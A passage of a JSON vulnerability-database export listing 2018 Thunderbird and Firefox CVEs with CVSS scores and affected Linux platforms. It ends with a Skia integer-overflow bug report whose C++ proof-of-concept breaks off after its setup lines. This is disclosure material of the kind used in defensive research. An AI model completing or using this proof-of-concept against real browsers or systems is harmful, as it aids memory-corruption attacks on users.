"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2018-06-11T21:29:00", "title": "CVE-2018-5168", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5168"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-5168", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5168", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "It is possible to spoof the filename of an attachment and display an arbitrary attachment name. This could lead to a user opening a remote attachment which is a different file type than expected. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8.", "edition": 9, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2018-06-11T21:29:00", "title": "CVE-2018-5170", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5170"], "modified": "2019-03-13T13:43:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-5170", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5170", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Memory safety bugs were reported in Firefox 59, Firefox ESR 52.7, and Thunderbird 52.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.", "edition": 12, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-11T21:29:00", "title": "CVE-2018-5150", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5150"], "modified": "2019-03-13T13:44:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-5150", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5150", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Plaintext of decrypted emails can leak through the src attribute of remote images, or links. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8.", "edition": 10, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-06-11T21:29:00", "title": "CVE-2018-5162", "type": "cve", "cwe": ["CWE-311"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5162"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-5162", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5162", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "A use-after-free vulnerability can occur while adjusting layout during SVG animations with text paths. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.", "edition": 12, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-11T21:29:00", "title": "CVE-2018-5155", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5155"], "modified": "2019-03-11T16:44:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-5155", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5155", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Crafted message headers can cause a Thunderbird process to hang on receiving the message. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8.", "edition": 9, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2018-06-11T21:29:00", "title": "CVE-2018-5161", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5161"], "modified": "2019-03-13T13:43:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-5161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5161", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "A use-after-free vulnerability can occur while enumerating attributes during SVG animations with clip paths. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.", "edition": 12, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-11T21:29:00", "title": "CVE-2018-5154", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5154"], "modified": "2019-03-11T16:51:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-5154", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5154", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}], "seebug": [{"lastseen": "2018-06-08T07:09:18", "description": "Skia bug report: https://bugs.chromium.org/p/skia/issues/detail?id=7674\r\nMozilla bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=1441941\r\n\r\n\r\nIn Skia, SkTDArray stores length (fCount) and capacity (fReserve) as 32-bit ints and does not perform any integer overflow checks. There are a couple of places where an integer overflow could occur:\r\n\r\n(1) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=369\r\n\r\n(2) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=382\r\n\r\n(3) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=383\r\n\r\nand possibly others\r\n\r\nIn addition, on 32-bit systems, multiplication integer overflows could occur in several places where expressions such as\r\n```\r\nfReserve * sizeof(T)\r\nsizeof(T) * count\r\n```\r\netc. are used.\r\n\r\nAn integer overflow in (2) above is especially dangerous as it will cause too little memory to be allocated to hold the array which will cause a out-of-bounds write when e.g. appending an element.\r\n\r\nI have successfully demonstrated the issue by causing an overflow in fPts array in SkPathMeasure (https://cs.chromium.org/chromium/src/third_party/skia/include/core/SkPathMeasure.h?l=104&rcl=23d97760248300b7aec213a36f8b0485857240b5) which is used when rendering dashed paths.\r\n\r\nThe PoC requires a lot of memory (My estimate is 16+1 GB for storing the path, additional 16GB for the SkTDArray we are corrupting), however there might be less demanding paths for triggering SkTDArray integer overflows.\r\n\r\n### PoC program for Skia\r\n```\r\n#include <stdio.h>\r\n\r\n#include \"SkCanvas.h\"\r\n#include \"SkPath.h\"\r\n#include \"SkGradientShader.h\"\r\n#include \"SkBitmap.h\"\r\n#include \"SkDashPathEffect.h\"\r\n\r\nint main (int argc, char * const argv[]) {\r\n\r\n SkBitmap bitmap;\r\n bitmap.allocN32Pixels(500, 500);\r\n\r\n //Create Canvas\r\n SkCanvas canvas(bitmap);\r\n\r\n SkPaint p;\r\n 